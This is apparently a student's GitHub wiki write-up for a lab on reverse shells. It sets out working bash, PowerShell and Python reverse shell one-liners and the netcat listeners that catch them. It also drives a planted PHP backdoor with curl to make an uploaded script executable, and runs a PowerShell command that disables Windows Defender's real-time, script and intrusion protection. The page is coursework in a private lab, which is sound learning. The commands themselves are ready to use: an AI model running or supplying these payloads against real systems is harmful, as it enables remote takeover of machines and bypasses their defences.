Lab 8.2 Reverse Shells - FlameSpyro/Tech-Journal GitHub Wiki

Lab 8.2 - Reverse Shells

  • A bash reverse shell requires two terminals to be open and our target to connect to us via nc. This lab has us test it on our machine, the windows 10 machine and Pippin while recording our commands in wireshark.

Linux

  • Open a terminal
ssh [email protected]@10.0.17.200
  • Open a second terminal
ip a
nc -nlvp 4449
  • Window 1
/bin/bash -i >& /dev/tcp/10.0.17.106/4449 0>&1
  • From here nc will allow us to enter any commands one fully connected such as pwd and whoami

Pippin

  • This took a bit more tries mostly because my script was wrong at first
echo '/bin/bash -i >& /dev/tcp/10.0.99.40/4449 0>&1' > eric-script.sh
ftp -i 10.0.5.25 (upload process from before)
exit

curl 'http://10.0.5.25/upload/eric-backdoor.php?cmd=ls%20-l'
curl 'http://10.0.5.25/upload/eric-backdoor.php?cmd=chmod%20777%20eric-script.sh'

Powershell

  • On windows cmd run the command with the proper IP
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.37',4449); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
  • Oh no! Defender did its job properly! Lets get around that.
  • One admin powershell:
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Rerun PowerShell

  • Start nc on a window from before
  • rerunning the cmd should result in a successful connection

Python Reverse

  • Like before, perform a NC with linux again.
nc -nlvp 4449
  • Window 2
ssh [email protected]@10.0.17.200
  • Run this python command!
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.17.106",4449));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'